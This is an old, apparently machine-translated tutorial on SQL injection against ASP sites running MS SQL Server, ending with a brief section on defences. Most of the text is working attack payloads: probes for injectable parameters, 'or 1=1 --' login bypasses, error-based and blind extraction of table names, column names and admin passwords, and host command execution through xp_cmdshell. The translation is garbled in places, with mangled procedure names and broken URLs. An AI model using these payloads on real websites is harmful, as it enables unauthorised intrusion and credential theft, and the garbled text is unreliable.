SQL Injection simple behavior VER1

Writer: demonalex
Email: demonalex [at] dark2s.org

Appendix: the subject of this article is to test the background websites of the popular ASP + ms SQL SERVER.
PS: I 've written a lot of bad articles recently and found many errors. Please advise me a lot :)

 

Basic Steps for SQL injection:

Find the SQL Injection entry point (a URL, a non-filtered character, etc.)-injection penetration behavior-penetration successful
========================================================== ========================================================== ======================================
Bytes ---------------------------------------------------------------------------------------------------------
How to find the SQL Injection entry point.

The common method is to add special characters/special strings, such:
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34"
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34;
Wait to see if the URL can be properly displayed to check whether there are SQL Injection Vulnerabilities and unfiltered characters in the URL. If a single quotation mark is added
Then:
"Microsoft ole db Provider for SQL Server Error 80040e14
There are unclosed quotation marks before the string ."
Then there is a "play"... or input:
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 and 1 = 1
And
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 and 1 = 2
Then check whether the website can be properly displayed (if 1 = 1, and 1 = 2 cannot prove that the website has the SQL injection vulnerability ).

Another method is to directly use the extended features of ms SQL SERVER to check whether the website has the vulnerability, such:
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = (select @ version)
If you are on a website like Shen, you can return:
"Change the nvarchar value to Microsoft SQL Server 2000-8.00.760 (Intel X86) Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0
(Build 2195: Service Pack 4) A syntax error occurs when you convert a column to an int type ."
Just ......:)

Bytes ---------------------------------------------------------------------------------------------------------
Find the SQL vulnerability and how to penetrate the machine.

The penetration method is endless, But I sum up the three methods (only for ASP + ms SQL SERVER): Escape
Authentication System, injection query to obtain database information, and SQL SERVER's extended storage process control host.

Escape Authentication System:

For details about how it works, refer to SQL Injection attack technology written by isno. This attack method is the simplest.
In the transparent step, first find the authentication "input area" and add the following to the "input area:
--
"--
Or
Or 1 = 1 --
"Or 1 = 1 --
Or a =
"Or" a "=
And so on.

Obtain the database information from the injection query:

This method is the most cumbersome (and interesting). The premise for using it is that you must have a certain SQL language base.
First, we need to get the table name and column name: Here I use the "having 1 = 1 --" string to cause the system to pop up data.
Database errors to get the table name and column Name:
Asp? PC_ID = 34 "> http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 having 1 = 1 --
Use group by to get other column names:
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 group by known table name. Known column name, known
Table name. Known column name 2 having 1 = 1 --
Keep going...

Method 2: exhaustive. This method is simple and applicable to all databases that support SQL languages (such as access and mysql ).
). For example:
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 and 0 <(select count (*) from table name)
This statement is in line with the syntax of the general SQL language. Let's look at the following statements:
0 <(select count (*) from table name)
This statement is set up when the total number of records in a table name is greater than 0. If this statement is true,
Again through it with "http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 "and the relationship is established, the page is
Returns the normal page. In this way, you can determine whether a table exists (unless the table exists and has no records ).
).

The third way to get the table name is:
Use the default built-in system table of ms SQL SERVER to obtain the table name in the current database.
System Table information_schema.tables is a table that stores the name of the table in the current database.
For more information, see:
Http://demonalex.nease.net/ SQL _injection/walkthrough.txt
In the exercise on SQL Injection skills:
"6.0 how can I get some important data from the ODBC error message returned by the database ?"
"6.1 How do I find the column names in the table ?"
These two paragraphs.
(Should there be other ways to get the table name and column name? Please let us know ).

Experts usually try to detect the data type in the following tests. However, for the sake of simplicity, I will not talk about it here,
Let's take a look at SQL Injection attack technology.

Now let's assume that we already know the table name and column name, and the remaining problem is to find the value.
There may be many methods, but I prefer to use "and 1 =" to judge:
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 and 1 = (select top rows count (*) f
Rom table name where len (column name)> 0)
The "number of rows" above is the row number to the upper limit; "table name" is the name of the table we originally found; "column name" is the original one.
Column name. Through the preceding logic operation, we can find the number of digits of a certain value of a row in a column in a table. It's time to start
The content of a certain data has been detected (for example, the password content: P ):
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 and 1 = (select top rows count (*) f
Rom table name where left (column name, the first number of values to the left) = a character or string)
For example:
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34 and 1 = (select top 1 count (*) from
Admin where left (password, 5) = admin)
In the preceding example, we can obtain the first five numbers of data in the password column of the first row under the table name admin.
The value is admin. Of course, this method is quite flexible, so the little God does not intend to fully "record" this in this article as much as possible
The main "calling method" of penetration (in fact, this penetration method is the essence of SQL injection techniques ).

Use SQL SERVER's Extended Stored Procedure Control Host:

The principle of using SQL server to expand the storage process control host is to use SQL SERVER
To control the host.
The most common extended stored procedure is xp_mongoshell:
First, the attacker will find that the SQL statement Terminator ";" is not filtered in the script, and then they will pass the following POST
Acts to initiate an attack on the attacked host.
Http://www.xxxx.com/Product/ViewProduct.asp? PC_ID = 34; exec master... xpcmdshell ping 127.
0.0.1
Bytes ---------------------------------------------------------------------------------------------------------
How to Prevent and defend against SQL injection.

Here, Xiao Shen summarized two solutions: manual defense and external defense.

Manual defense mainly refers to the use of manual modification of the program and script runtime environment to clear vulnerabilities. ISNO
The substitution function is used to modify the substitution form of the variables inhaled by the script.
Input = replace (input ,"","")
In addition to single quotes, other injection symbols can also be like this. Modification to the script running environment mainly refers to the ease of deletion.
Extended storage processes used by hackers, such:
Xp_mongoshell
Xp_reg *
Xp_servicecontrol
Sp_oa *
Xp_startmail
Xp_sendmail
Sp_makewebtask
And so on. In addition, it is best to change the database OWNER to a non-sa user when calling the database, so as to prevent hackers from learning about S
After QL injection, sp_addextendedproc is used to restore the expansion process.

In addition, the Defense method is to work with other facilities (hardware/software) to "root" of SQL injection (POST content of the client ).
Filter. Both hardware and software have the same principle. They decode POST data until the application layer.
Use the data at the layer to filter keywords and perform related operations. In terms of hardware implementation, such defense behavior is mainly handed over
Implemented by the filter gateway and IDS. However, there are not many people who can use such hardware devices, so we choose software
Our main "defense weapon" integrates the latest software security products, and finally advocates EEYE's SecureIIS.
(I will write an introduction to it later :).